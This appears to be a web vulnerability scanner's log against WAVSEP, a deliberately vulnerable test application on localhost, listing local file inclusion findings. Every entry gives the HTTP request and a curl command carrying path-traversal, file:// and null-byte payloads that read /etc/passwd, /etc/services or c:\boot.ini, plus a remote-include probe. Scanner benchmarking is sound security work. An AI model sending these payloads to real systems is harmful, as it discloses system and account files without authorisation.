curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-302Redirect/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-404Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
